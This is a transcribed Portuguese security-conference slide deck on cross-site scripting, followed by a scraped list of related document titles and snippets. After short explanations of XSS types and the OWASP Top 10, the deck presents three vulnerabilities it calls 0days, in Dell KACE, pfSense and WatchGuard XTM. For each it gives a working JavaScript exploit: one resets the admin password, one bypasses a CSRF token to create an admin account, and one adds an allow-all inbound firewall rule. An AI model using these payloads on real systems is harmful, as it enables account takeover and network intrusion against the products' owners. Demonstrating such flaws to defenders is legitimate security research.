Quem tem medo de XSS? William Costa

Tamanho: px
Começar a partir da página:

Download "Quem tem medo de XSS? William Costa"

Transcrição

1 Quem tem medo de XSS? William Costa

2 Composição do XSS. Os XSS s normalmente são divididos em 3 categorias Reflected XSS Stored XSS DOM Based XSS

3 Reflected XSS Quando o usuário envia uma requisição durante uma consulta em uma pagina de pesquisa ou em uma variável. Ex: hfp://www.vulneravel.com.br/nojcias/?jpo=r"><script>alert("reflected XSS")</script>

4 Stored XSS Isso ocorre quando o Script e salvo no servidor sendo assim carregado a cada vez que a pagina for acessada. Ex: Mensagem em um fórum, formulares de compras, entre outros Após adicionar o comentário qualquer pessoa que acesse o Forum recebem a tela

5 DOM XSS O DOM XSS é quando é inserido o payload dentro de uma variável ujlizada por um script Ex: Campos de interação em tempo real. <img src=search onerror=alert('dom_xss')>

6 O XSS aparece no top 10 do OWASP desde seu primeiro relatório. OWASP Top Top VulnerabiliIes in Web ApplicaIons A1 Unvalidated Parameters A2 Broken Access Control A3 Broken Account and Session Management A4 Cross- Site Scrip8ng (XSS) Flaws A5 Buffer Overflows A6 Command InjecIon Flaws A7 Error Handling Problems A8 Insecure Use of Cryptography A9 Remote AdministraIon Flaws A10 Web and ApplicaIon Server MisconfiguraIon

7 E após 10 Anos ele conjnua entre os 10 OWASP Top (New) A1 InjecIon A2 Broken AuthenIcaIon and Session Management A3 Cross- Site Scrip8ng (XSS) A4 Insecure Direct Object References A5 Security MisconfiguraIon A6 SensiIve Data Exposure A7 Missing FuncIon Level Access Control A8 Cross- Site Request Forgery (CSRF) A9 Using Known Vulnerable Components A10 Unvalidated Redirects and Forwards

8 Como são apresentadas as Falhas de XSS

9 Como normalmente é apresentando o Impacto do XSS

10 Como elas deferiam ser apresentadas

11 Como realmente são os Impactos dos XSS

12 Falha #1 Dell KACE V Falha na pagina de criação de um Ticket. Proteções: Flag HFpOnly Token CSRF URL Vulnerável: /adminui/bug_report.php?locajon=/adminui/jcket.php?id=20000<script>alert("xss");</ script>

13 Pagina onde ocorre a vulnerabilidade Alguma Ideia de como podemos ir além do alert?

14 Função Alvo

15 Exploit para alteração da senha do ADMIN. Um simples Iframe já nos possibilita a alteração de senha do usuário administrador. document.write('<iframe width=0 height=0 name="xss" src="hlps://uvo128qv8c8mqmdetcu.vm.cld.sr/adminui/user.php?id=10"> iframe>'); funcion append(senha) { window.frames['xss'].document.getelementsbyname('farray[password]')[0].value="senha123"; window.frames['xss'].document.getelementsbyname('farray[password_confirm]')[0].value="senha123"; window.frames['xss'].document.userform.submit(); } settimeout("append(\"imeout\")",2500);

16 Falha #2 PFSENSE V Falha na pagina de remoção de CapJves portais. Proteções: Token CSRF Checagem do Header HTTP_REFERER

17 Pagina onde ocorre a vulnerabilidade Alguma Ideia?

18 Função Alvo

19 Exploit para criação de Usuário de Administração. O Exploit cria um formulário dentro da pagina vulnerável obtém o TOKEN CSRF da mesma e envia o form para a pagina de criação de usuários bypassando a proteção do HTTP_REFERER document.write('<iframe width=1000 height=1000 name="xss"> </iframe>'); xss.document.write('<body><form id="csrf" acion="hlp:// /system_usermanager.php" method="post" name="csrf">'); xss.document.write('<input name=" csrf_magic" value=""</input>'); xss.document.write('<input name="utype" value="user"> </input>'); xss.document.write('<input name="usernamefld" value="teste"> </input>'); xss.document.write('<input name="passwordfld1" value="123456"> </input>'); xss.document.write('<input name="passwordfld2" value="123456"> </input>'); xss.document.write('<input name="groups[]" value="admins"> </input>'); xss.document.write('<input name="save" value="save"> </input>'); xss.document.write('</form>'); xss.document.write('</body>'); window.frames['xss'].document.getelementsbyname(' csrf_magic')[0].value=csrfmagictoken; window.frames['xss'].document.csrf.submit();

20 Falha #3 Firewall WatchGuard XTM V B Falha na pagina de Gerenciamento de Access Point. Proteções: Token CSRF Flag HFpOnly

21 Pagina onde ocorre a vulnerabilidade URL Vulneravel: /network/controller/ap?acjon=add"</script><script>alert( XSS )</script> Ideias??

22 Função Alvo

23 Exploit. Vamos usar uma função JSON que envie via post todas informações necessárias para criação de uma poliica que permita tudo de fora para dentro da rede. $.ajax({ type: "POST", url: "hlps:// :8080/put_data/", data: '{" class ":"PageFirewallPolicyObj"," module ":"modules.scripts.page.firewall.pagefirewallpolicyobj","is_new":1,"pol": {" class ":"FirewallPolicySe~ngsObj"," module ":"modules.scripts.page.firewall.pagefirewallpolicyobj","name":"exploit- Rule","enabled":true,"descripIon":"Policy added on T18:02:38-03:00.","property": 0,"type":"Firewall","firewall":"Allowed","reject_acIon":"TCP_RST","from_list":[{"type":0,"address":"Any","interface":"Any","user":"Any","user_display_info": {"type":"","name":"","auth_domain":""},"display_name":"","alias_name":"any- External","address_type":- 1,"tunnel_type":false,"name":"","obj":null}],"to_list": [{"type":0,"address":"any","interface":"any","user":"any","user_display_info":{"type":"","name":"","auth_domain":""},"display_name":"","alias_name":"any- Trusted","address_type":- 1,"tunnel_type":false,"name":"","obj":null}],"policy_nat":"","proxy":"","service":"Any","schedule":"Always On","app_acIon":"","forward_traffic_mgmt":"","reverse_traffic_mgmt":"","ips_monitor_enabled":true,"quota_enabled":false,"auto_block_enabled": 0,"idle_Imeout":180,"idle_Imeout_enabled":0,"policy_sIcky_Imer":0,"policy_sIcky_Imer_enabled":0,"using_global_sIcky_se~ng": 1,"apply_one_to_one_nat_rules":1,"apply_dnat_global":1,"apply_dnat_all_traffic":0,"dnat_src_ip":" ","dnat_src_ip_enabled":0,"log_enabled": 0,"snmp_enabled":0,"noIficaIon_enabled":0,"noIficaIon_type":0,"launch_interval":900,"repeat_count":10,"enable_qos":0,"marking_field":1,"marking_method": 0,"dscp_value":0,"precedence_value":0,"priority_method":1,"priority":0,"proxy_qos":0,"audio_priority":0,"video_priority":0,"data_priority":0,"pbr_enabled": 0,"pbr_interface":"","failover_enabled":0,"abs_policy_rouIng":[],"connecIon_rate_enabled":0,"connecIon_rate":100,"use_policy_based_icmp": 0,"pmtu_discovery":1,"Ime_exceeded":1,"network_unreachable":1,"host_unreachable":1,"port_unreachable":1,"protocol_unreachable":1,"tag_list": []},"page_security_app_control_config_obj":null,"page_firewall_scheduling_config_obj":null,"schedule_predefined_flag": 1,"page_firewall_proxy_aciton_obj":null,"proxy_acIon_predefined_flag":0,"global_ips_enabled":false,"global_quota_enabled":false,"alias_user_hash": {},"proxy_policy_flag":false,"proxy_acions":[],"app_acions":[],"global_qos_enable":false,"port_protocol_se~ngs": [{"protocol":"any","port":""}],"proxy_type":"","muli_wan_enabled":0,"muliwan_algo":0,"ext_interfaces": [{"if_dev_name":"eth0","data":"external","name":"external","if_num":0}],"vif_list":[],"helper_in _list":[],"helper_tunnel_list":[],"helper_alias_list": [],"helper_fw_group_list":[],"helper_fw_user_list":[],"helper_pptp_group_list":[],"helper_pptp_user_list":[],"helper_sslvpn_group_list": [],"helper_sslvpn_user_list":[],"helper_user_group_list":[],"external_ip_list":[],"helper_snat_list":[],"helper_slb_list": [],"traffic_mgmt_enabled":false,"helper_tm_acions":[],"helper_tag_list":[],"helper_schedule_list":[],"helper_app_acion_list": [],"rip_enabled":false,"ospf_enabled":false,"bgp_enabled":false}', contenttype: "applicaion/json; charset=utf- 8", accept: "*/*", datatype: "json",

24 As 3 vulnerabilidades apresentadas aqui são 0days, Baixem e façam seus próprios testes J

25 <script>alert(string(/perguntas?/).substr(1,10) ); </script> william.costa arroba gmail.com

Segurança no Plone. Fabiano Weimar dos Santos [Xiru] xiru@xiru.org

Segurança no Plone. Fabiano Weimar dos Santos [Xiru] xiru@xiru.org Segurança no Plone Fabiano Weimar dos Santos [Xiru] xiru@xiru.org Roteiro Um pouco sobre mim... Introdução Como Plone É tão Seguro? Modelo de Segurança OWASP Top 10 Segurança no Plone - Provedor PyTown.com

Leia mais

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail.

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail. Top Ten OWASP Fausto Levandoski 1 1 Universidade do Vale do Rios dos Sinos (UNISINOS) Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil farole@gmail.com Abstract.

Leia mais

Conviso Security Training Ementa dos Treinamentos

Conviso Security Training Ementa dos Treinamentos Escritório Central Rua Marechal Hermes 678 CJ 32 CEP 80530-230, Curitiba, PR T (41) 3095.3986 www.conviso.com.br Conviso Security Training Ementa dos Treinamentos Apresentação Sobre este Documento Este

Leia mais

Aula 11 Integrando Segurança ao Processo de Desenvolvimento de Software. Prof. Leonardo Lemes Fagundes

Aula 11 Integrando Segurança ao Processo de Desenvolvimento de Software. Prof. Leonardo Lemes Fagundes Aula 11 Integrando Segurança ao Processo de Desenvolvimento de Software Prof. Leonardo Lemes Fagundes A educação faz com que as pessoas sejam fáceis de guiar, mas difíceis de arrastar; fáceis de governar,

Leia mais

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia. Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)

Leia mais

segurança em aplicações web

segurança em aplicações web segurança em aplicações web myke hamada mykesh gmail 1 whoami ciência da computação segurança da informação ruby rails c# vbscript opensource microsoft ethical hacking 2 agenda introdução ontem e

Leia mais

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com (In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades

Leia mais

10 maiores riscos em aplicações Web

10 maiores riscos em aplicações Web 10 maiores riscos em aplicações Web Leandro Silva dos Santos Thiago Stuckert leandrosantos@inbrax.com thiago.melo.stuckert@gmail.com.br Novembro - 2010 1 Open Web Application Security Project (OWASP) Organização

Leia mais

Segurança no Desenvolvimento

Segurança no Desenvolvimento Segurança no Desenvolvimento Palestrante: Daniel Araújo Melo Grupo de Resposta a Ataques da Intranet 00/00/0000 Agenda Apresentação do Grupo de Resposta a Ataques Melhores Práticas ISO 15408 OWASP BSIMM

Leia mais

Desenvolvimento de Aplicações para Internet Aula 11

Desenvolvimento de Aplicações para Internet Aula 11 Desenvolvimento de Aplicações para Internet Aula 11 Celso Olivete Júnior olivete@fct.unesp.br www.fct.unesp.br/docentes/dmec/olivete jquery Na aula passada: Selecionando atributos Manipulando CSS Inserindo

Leia mais

Boas Práticas de Desenvolvimento Seguro

Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

OWASP: Introdução OWASP. The OWASP Foundation http://www.owasp.org

OWASP: Introdução OWASP. The OWASP Foundation http://www.owasp.org : Introdução Carlos Serrão Portugal ISCTE/DCTI/Adetti/NetMuST Abril, 2009 carlos.serrao@iscte.pt carlos.j.serrao@gmail.com Copyright 2004 - The Foundation Permission is granted to copy, distribute and/or

Leia mais

Como implementar Cache Busting nas tags da Atlas. O que são tags? O que é Cache Busting?

Como implementar Cache Busting nas tags da Atlas. O que são tags? O que é Cache Busting? Guia de implementação de cache busting e teste de tags Atlas Ad Server http:///operacoes/guia_implementacao_cachebusting_teste_tags_atlas_aunica.pdf Este documento é destinado à orientação e ao suporte

Leia mais

www.coldfusionbrasil.com.br

www.coldfusionbrasil.com.br www.coldfusionbrasil.com.br 2000 VARIÁVEIS CGI 3 CGI.NOME_DA_VARIÁVEL 3 VARIÁVEIS CGI SERVIDOR 3 VARIÁVEIS CGI CLIENTE 3 USANDO AS VARIÁVEIS CGI 4 REDIRECIONANDO APLICAÇÕES 4 INTERAGINDO COM ARQUIVOS 5

Leia mais

Attacking Session Management

Attacking Session Management Attacking Session Management Alexandre Villas (alequimico) Janeiro de 2012 SUMÁRIO 1. Introdução 2. Classes de ataques ao gerenciamento de sessão 1. Session Fixation 2. Predição 3. Interceptação 4. Força

Leia mais

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma

Leia mais

Web Application Firewall

Web Application Firewall Web Application Firewall SonicWALL Secure Remote Access Appliances Junho 2012 Edilson Cantadore Dell SonicWALL Brasil +55-11-7200-5833 Edilson_Cantadore@Dell.com Aplicações Web Cada vez mais objetos de

Leia mais

Análise de Vulnerabilidades em Aplicações WEB

Análise de Vulnerabilidades em Aplicações WEB Análise de Vulnerabilidades em Aplicações WEB Apresentação Luiz Vieira Construtor 4Linux Analista e Consultor de Segurança 15 anos de experiência em TI Pen-Tester Articulista sobre Segurança de vários

Leia mais

UNIVERSIDADE DO ESTADO DE SANTA CATARINA CENTRO DE CIÊNCIAS TECNOLÓGICAS - CCT TECNOLOGIA EM ANÁLISE E DESENVOLVIMENTO DE SISTEMAS

UNIVERSIDADE DO ESTADO DE SANTA CATARINA CENTRO DE CIÊNCIAS TECNOLÓGICAS - CCT TECNOLOGIA EM ANÁLISE E DESENVOLVIMENTO DE SISTEMAS UNIVERSIDADE DO ESTADO DE SANTA CATARINA CENTRO DE CIÊNCIAS TECNOLÓGICAS - CCT TECNOLOGIA EM ANÁLISE E DESENVOLVIMENTO DE SISTEMAS ANDRE MENDES DUARTE DEIWYS LUCIANO GRUMOVSKI GUSTAVO HEIDRICH GRUNWALD

Leia mais

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel

Leia mais

Segurança e Insegurança em Aplicações Internet Java EE. Fernando Lozano Consultor 4Linux lozano@4linux.com.br

Segurança e Insegurança em Aplicações Internet Java EE. Fernando Lozano Consultor 4Linux lozano@4linux.com.br Segurança e Insegurança em Aplicações Internet Java EE Fernando Lozano Consultor 4Linux lozano@4linux.com.br 2/33 3/33 Sua Rede Está Segura? Seus servidores e desktops estão seguros: Firewall, anti-vírus,

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,

Leia mais

UNIVERSIDADE FEDERAL DE RORAIMA PRÓ REITORIA DE PLANEJAMENTO DIRETORIA DE TECNOLOGIA DA INFORMAÇÃO COORDENAÇÃO DE SISTEMAS DE INFORMAÇÃO

UNIVERSIDADE FEDERAL DE RORAIMA PRÓ REITORIA DE PLANEJAMENTO DIRETORIA DE TECNOLOGIA DA INFORMAÇÃO COORDENAÇÃO DE SISTEMAS DE INFORMAÇÃO 1 Perfis Envolvidos SIGAA GRADUAÇÃO Manual do Administrador Perfil Administrador DAE Administrador de Graduação: Administrador de Graduação (Servidor responsável pelo gerenciamento administrativo, cadastro

Leia mais

Manual 2010 Webmaster

Manual 2010 Webmaster Manual 2010 Webmaster Menu 1. Acesso ao sistema 2. Campanhas 2.1 Ver Campanhas Disponíveis 2.2 Minhas Campanhas 3. Formatos 3.1 Banners Automáticos 3.2 Banners Manuais 3.3 E-mail Marketing 3.4 Vitrines

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

OWASP. Ferramentas & Tecnologias OWASP. The OWASP Foundation http://www.owasp.org. Joaquim Marques OWASP@PT. 2 Abril, 2009

OWASP. Ferramentas & Tecnologias OWASP. The OWASP Foundation http://www.owasp.org. Joaquim Marques OWASP@PT. 2 Abril, 2009 OWASP Ferramentas & Tecnologias Joaquim Marques OWASP@PT OWASP 2 Abril, 2009 Copyright 2007 - The OWASP Foundation This work is available under the Creative Commons SA 2.5 license The OWASP Foundation

Leia mais

LINGUAGEM DE PROGRAMAÇÃO WEB

LINGUAGEM DE PROGRAMAÇÃO WEB LINGUAGEM DE PROGRAMAÇÃO WEB GABRIELA TREVISAN Formulários e Aula 3 Relembrando HTML 5 Tag Form o Utilizada para marcar a região do formulário. o Os atributos mais importantes são o method e o action.

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:

Leia mais

ESET Remote Administrator ESET EndPoint Solutions ESET Remote Adminstrator Workgroup Script de Logon

ESET Remote Administrator ESET EndPoint Solutions ESET Remote Adminstrator Workgroup Script de Logon AGENDA 1. Download dos pacotes de instalação ESET Remote Administrator 2. Download dos pacotes de instalação ESET EndPoint Solutions 3. Procedimento de instalação e configuração básica do ESET Remote Adminstrator

Leia mais

Capítulo 4. Programação em ASP

Capítulo 4. Programação em ASP Índice: CAPÍTULO 4. PROGRAMAÇÃO EM ASP...2 4.1 REGISTRAR...2 4.1.1 Códigos para configuração do objeto...2 4.1.2 Formulário para transferir dados da impressão digital...3 4.1.3 Código Javascript para registro

Leia mais

Conceitos de Ajax Exemplos de uso do Ajax no braço, muitos exemplos, muito código (HTML, CSS, JavaScript, PHP, XML, JSON)

Conceitos de Ajax Exemplos de uso do Ajax no braço, muitos exemplos, muito código (HTML, CSS, JavaScript, PHP, XML, JSON) Márcio Koch 1 Currículo Formado na FURB em Ciência da Computação Pós graduado em Tecnologias para o desenvolvimento de aplicações web Mestrando em Computação Gráfica na UDESC Arquiteto de software na Senior

Leia mais

Segurança em Aplicações Web Metodologia OWASP

Segurança em Aplicações Web Metodologia OWASP Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário

Leia mais

Desenvolvimento Web XHTML Formulários. Prof. Bruno E. G. Gomes

Desenvolvimento Web XHTML Formulários. Prof. Bruno E. G. Gomes Desenvolvimento Web XHTML Formulários Prof. Bruno E. G. Gomes 2014 Introdução Um recurso bastante utilizado no desenvolvimento Web é o envio de dados de uma página para o servidor quando fornecemos informações,

Leia mais

Utilizamos um tema no Mais Fórmula 1 que possui algumas peculiaridades. Irei explicar passo-a-passo cada uma delas.

Utilizamos um tema no Mais Fórmula 1 que possui algumas peculiaridades. Irei explicar passo-a-passo cada uma delas. Mais Fórmula 1 Instruções de postagem no Mais Fórmula 1. O Mais Fórmula 1 está hospedado na UOL HOST e é gerenciado pelo Wordpress. O Wordpress é um dos melhores sistemas de gerenciamento de conteúdo do

Leia mais

MANUAL JOOMLA 2.5 PORTAL INTERNET. Ministério do Esporte

MANUAL JOOMLA 2.5 PORTAL INTERNET. Ministério do Esporte MANUAL JOOMLA 2.5 PORTAL INTERNET Ministério do Esporte SUMÁRIO 1.0 - Módulo Administração... 1 2.0 Banner randômico... 2 2.1 Adicionar novo slide... 2 2.2 Excluir slide... 6 3.0 Artigos... 7 3.1 Adicionar

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos

Leia mais

Centro de Inteligência em Tecnologia da Informação e Segurança Tutorial Ammyy admin

Centro de Inteligência em Tecnologia da Informação e Segurança Tutorial Ammyy admin Tutorial Ammyy admin Hoje em dia, quase tudo pode ser feito remotamente, a grande dificuldade seria o acesso remoto com segurança mas sem se preocupar em fazer enormes ajustes no FIREWALL, felizmente existem

Leia mais

GESTA - UFMG observatório de conflitos ambientais do estado de minas gerais

GESTA - UFMG observatório de conflitos ambientais do estado de minas gerais GESTA - UFMG observatório de conflitos ambientais do estado de minas gerais guia de administração do site -1 - INTELIGÊNCIA GEOGRÁFICA EQUIPE TÉCNICA COORDENADOR DO PROJETO Jean Charles Sousa (GeoHorizonte)

Leia mais

MANUAL DE INSTRUÇÕES E-SIS Sistema Integrado de Saúde

MANUAL DE INSTRUÇÕES E-SIS Sistema Integrado de Saúde MANUAL DE INSTRUÇÕES E-SIS Sistema Integrado de Saúde MÓDULO DE ALMOXARIFADO PERFIL DE CONSUMIDOR O módulo de ALMOXARIFADO, que compõe o E-SIS (Sistema Integrado de Saúde), é responsável pelo recebimento,

Leia mais

Programação para Internet

Programação para Internet Programação para Internet Aula 09 Os direitos desta obra foram cedidos à Universidade Nove de Julho Este material é parte integrante da disciplina oferecida pela UNINOVE. O acesso às atividades, conteúdos

Leia mais

Nome do Artigo: Desenvolvendo um scanner para Joomla Password Change Admin. Linguagem de Programação: Perl (Practical Extraction and Report Language)

Nome do Artigo: Desenvolvendo um scanner para Joomla Password Change Admin. Linguagem de Programação: Perl (Practical Extraction and Report Language) Author: Inj3cti0n P4ck3t Date: 13/10/10 Nome do Artigo: Desenvolvendo um scanner para Joomla Password Change Admin Contato: fer_henrick@hotmail.com Nome: Fernando Henrique Mengali de Souza Linguagem de

Leia mais

Cross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo

Cross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo Cross-Site Scripting Paulo Ricardo Lisboa de Almeida 1 Cross-Site Scripting - XSS Foco no ataque aos usuários finais O servidor não é diretamente afetado Dificuldade na detecção dos ataques Podem comprometer

Leia mais

INTRODUÇÃO AO DESENVOLVIMENTO WEB

INTRODUÇÃO AO DESENVOLVIMENTO WEB INTRODUÇÃO AO DESENVOLVIMENTO WEB PROFª. M.Sc. JULIANA H Q BENACCHIO Formulários Os formulários em HTML são usados para selecionar diferentes tipos de entradas do usuário. Um formulário é uma área que

Leia mais

Introdução. HyperText Markup Language HTML. Formulário. Fluxo do Formulário. Fluxo do Formulário. Fluxo do Formulário. Fluxo do Formulário

Introdução. HyperText Markup Language HTML. Formulário. Fluxo do Formulário. Fluxo do Formulário. Fluxo do Formulário. Fluxo do Formulário Introdução HyperText Markup Language HTML Formulário Prof. Luis Nícolas de Amorim Trigo nicolas.trigo@ifsertao-pe.edu.br http://professor.ifsertao-pe.edu.br/nicolas.trigo/ O usuário interage com os serviços

Leia mais

Scriptlets e Formulários

Scriptlets e Formulários 2 Scriptlets e Formulários Prof. Autor: Daniel Morais dos Reis e-tec Brasil Programação Avançada Para Web Página1 Meta Permitir ao aluno aprender a criar um novo projeto Java para web no Netbeans IDE,

Leia mais

O primeiro passo é habilitar acesso externo através de web service a configuração é bem simples e não exige maiores explicações.

O primeiro passo é habilitar acesso externo através de web service a configuração é bem simples e não exige maiores explicações. Integração de Controle de versão com Redmine. A integração do controle de versão pode permitir uma interatividade bem interessante entre os tickets e projetos do redmine com o controle de versão segue

Leia mais

Sistema de Gerenciamento Remoto www.pevermelho.art.br

Sistema de Gerenciamento Remoto www.pevermelho.art.br Sistema de Gerenciamento Remoto www.pevermelho.art.br 1 - SOBRE O SGR Este manual irá lhe ajudar a entender o funcionamento do SGR (Sistema de Gerenciamento Remoto) permitindo assim que você possa atualizar

Leia mais

Manual do usuário - Service Desk SDM - COPASA. Service Desk

Manual do usuário - Service Desk SDM - COPASA. Service Desk Manual do usuário - Service Desk SDM - COPASA Service Desk Sumário Apresentação O que é o Service Desk? Terminologia Status do seu chamado Utilização do Portal Web Fazendo Login no Sistema Tela inicial

Leia mais

Latinoware 2016 Foz do Iguaçu, PR 20 de outubro de 2016

Latinoware 2016 Foz do Iguaçu, PR 20 de outubro de 2016 Latinoware 2016 Foz do Iguaçu, PR 20 de outubro de 2016 Segurança em IoT: Novos desafios, velhos problemas Miriam von Zuben miriam@cert.br Tratamento de Incidentes Articulação Apoio à recuperação Estatísticas

Leia mais

Descrição de Ataques XSS em servidores Web

Descrição de Ataques XSS em servidores Web ABSTRACT Descrição de Ataques XSS em servidores Web Leonardo Santos Silva São Paulo, Brasil Com a proliferação de sítios web e a incapacidade dos desenvolvedores em manter um código atualizado contra os

Leia mais

Utilizando Janelas e Frames

Utilizando Janelas e Frames Utilizando Janelas e Frames Aprenderemos agora algumas técnicas mais específicas para fazer o JavaScript trabalhar com várias partes das páginas e navegadores da Web. Controlando janelas com objetos Já

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

mkdir /srv/www/default/html/calculadora/imagens mkdir /srv/www/default/html/calculadora/blocos

mkdir /srv/www/default/html/calculadora/imagens mkdir /srv/www/default/html/calculadora/blocos Programando em PHP www.guilhermepontes.eti.br lgapontes@gmail.com Criando uma Calculadora Primeiramente deve se criar uma estrutura para armazenar os arquivos necessários para o funcionamento da calculadora.

Leia mais

MANUAL DE UTILIZAÇÃO. HELP SUPORTE e HELP - REMOTO (Versão de usuário: 2.0)

MANUAL DE UTILIZAÇÃO. HELP SUPORTE e HELP - REMOTO (Versão de usuário: 2.0) MANUAL DE UTILIZAÇÃO HELP SUPORTE e HELP - REMOTO (Versão de usuário: 2.0) 1 Sumário 1 Introdução...3 2 O que é o HELP Suporte?...3 3 Cadastro no Help Suporte...3 4 Como Acessar e Utilizar o HELP SUPORTE...3

Leia mais

GUIA DE INÍCIO RÁPIDO http://pivot.cos.com

GUIA DE INÍCIO RÁPIDO http://pivot.cos.com GUIA DE INÍCIO RÁPIDO http://pivot.cos.com CRIAÇÃO DE SUA CONTA Se não possuir uma conta do Pivot, vá para http://pivot.cos.com e clique no link Sign up (Inscreverse) no canto superior direito da tela.

Leia mais

Segurança em Sistemas Web. Addson A. Costa

Segurança em Sistemas Web. Addson A. Costa Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.

Leia mais

Biblioteca de segurança para tratar as principais vulnerabilidades web

Biblioteca de segurança para tratar as principais vulnerabilidades web Biblioteca de segurança para tratar as principais vulnerabilidades web Tarcizio Vieira Neto DIOPE/COGSI/SISEC/SIDES Líder em soluções de TI para governo Apresentação pessoal Tarcizio Vieira Neto 4 anos

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

Desenvolvedor Web Docente André Luiz Silva de Moraes

Desenvolvedor Web Docente André Luiz Silva de Moraes Roteiro 2: Introdução a Linguagem HTML Neste roteiro é explorada a linguagem HTML. A linguagem HTML (Hypertext Markup Language) é amplamente utilizada na construção de páginas de internet e é responsável

Leia mais

Ajax Asynchronous JavaScript and Xml

Ajax Asynchronous JavaScript and Xml Ajax Asynchronous JavaScript and Xml Ajax permite construir aplicações Web mais interativas, responsivas, e fáceis de usar que aplicações Web tradicionais. Numa aplicação Web tradicional quando se prime

Leia mais

IFSC-Programação para a WEB - prof. Herval Daminelli

IFSC-Programação para a WEB - prof. Herval Daminelli 1 Um script em PHP ou página HTML pode transferir dados para outro script em PHP no servidor de diversas maneiras. Algumas destas maneiras são: Por meio de formulários, usando o método GET ou POST; Através

Leia mais

Estratégias de Segurança para Desenvolvimento de Software. Italo Valcy e Kaio Rodrigo CoSIC / STI-UFBA

Estratégias de Segurança para Desenvolvimento de Software. Italo Valcy e Kaio Rodrigo CoSIC / STI-UFBA Estratégias de Segurança para Desenvolvimento de Software Italo Valcy e Kaio Rodrigo CoSIC / STI-UFBA Aplicações como alvo nos ataques https://blogs.technet.microsoft.com/seguridad/2014/09/24/site-de-um-dos-maiores-jornais-do-brasil-foicomprometido-com-malware-que-tentou-alterar-as-configuraes-de-dns-nos-roteadores-das-vtimas/

Leia mais

